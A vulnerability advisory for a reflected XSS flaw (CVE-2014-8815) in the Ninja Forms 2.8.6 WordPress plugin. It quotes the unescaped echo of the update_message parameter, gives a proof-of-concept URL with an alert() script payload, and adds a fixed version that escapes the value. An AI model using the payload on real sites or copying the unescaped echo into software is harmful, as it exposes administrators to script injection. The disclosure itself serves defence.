Ninja Forms 2.8.6 Reflected XSS

Homepage:

https://wordpress.org/plugins/ninja-forms/

CVE-ID:

CVE-2014-8815

CVSS Score:

3.5

CVSS Vector:

(AV:N/AC:M/Au:S/C:P/I:N/A:N)

Description:

$_REQUEST['update_message'] is echoed into the admin page without being escaped.

File: ninja-forms\includes\admin\admin.php

if( !isset( $ninja_forms_admin_update_message ) AND isset( $_REQUEST['update_message'] ) ){
	$ninja_forms_admin_update_message = $_REQUEST['update_message'];
}
if( isset( $ninja_forms_admin_update_message ) AND $ninja_forms_admin_update_message != '' ){
	?>
	<div id="message" class="updated below-h2">
		<p>
			<?php echo $ninja_forms_admin_update_message;?>
		</p>
	</div>
	<?php
}

Proof of Concept:

The reflected XSS is visible only to an admin:

http://wordpress-instalation/wp-admin/admin.php?page=ninja-forms&update_message=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
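
Added example, not part of the original advisory and not the plugin's own code: the same notice rendered with the message escaped at output time, fed the URL-decoded value from the request above. The names nf_example_escape and nf_example_render_notice are hypothetical, and the example assumes update messages are plain text; inside WordPress the escaping call is esc_html().

```php
<?php
// Added example, not the plugin's code: escape update_message at output time.

/**
 * Escape text for an HTML element body. Inside WordPress this defers to
 * esc_html(); the htmlspecialchars() fallback lets the file run stand-alone.
 */
function nf_example_escape(string $text): string
{
    if (function_exists('esc_html')) {
        return esc_html($text);
    }
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the admin notice the way admin.php does, but treat the message as
 * plain text (assumption). $request stands in for $_REQUEST, $preset for a
 * message already set by other plugin code.
 */
function nf_example_render_notice(array $request, ?string $preset = null): string
{
    $message = $preset;
    if ($message === null && isset($request['update_message'])) {
        // update_message[]=x arrives as an array; accept strings only.
        $value = $request['update_message'];
        $message = is_string($value) ? $value : '';
    }
    if ($message === null || $message === '') {
        return '';
    }
    return '<div id="message" class="updated below-h2"><p>'
        . nf_example_escape($message)
        . '</p></div>';
}

// Constructed input: the URL-decoded update_message value from the request above.
$sample = ['update_message' => '<script>alert(String.fromCharCode(88,83,83));</script>'];
echo nf_example_render_notice($sample), PHP_EOL;

// Constructed benign message: rendered unchanged.
echo nf_example_render_notice(['update_message' => 'Form saved']), PHP_EOL;

// Constructed array-valued parameter: rejected, nothing is rendered.
var_dump(nf_example_render_notice(['update_message' => ['x']]));
```

With the value escaped, the angle brackets reach the browser as &lt; and &gt; and the script element is displayed as text instead of being parsed.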

Timeline: